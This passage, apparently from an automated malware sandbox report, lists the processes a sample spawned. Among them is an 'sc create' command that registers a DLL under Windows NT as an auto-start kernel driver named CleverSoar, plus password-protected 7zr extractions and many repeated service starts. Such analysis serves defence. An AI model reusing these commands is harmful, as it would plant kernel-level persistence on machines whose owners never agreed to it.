                                    Has exited:true

                                    Target ID:7
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                    Wow64 process (32bit):true
                                    Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                    Imagebase:0x560000
                                    File size:831'200 bytes
                                    MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    • Detection: 0%, Virustotal, Browse
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:10
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                    Wow64 process (32bit):true
                                    Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                    Imagebase:0x560000
                                    File size:831'200 bytes
                                    MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:13
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff717f30000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    Target ID:15
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:42
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:43
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:44
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:46
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:47
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:48
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:49
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:50
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:51
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:52
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:53
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:54
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:55
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:56
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:57
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:58
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:59
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:60
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff7403e0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:61
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:62
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:63
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:64
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:65
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:66
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:67
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:68
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:69
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:70
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:71
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:72
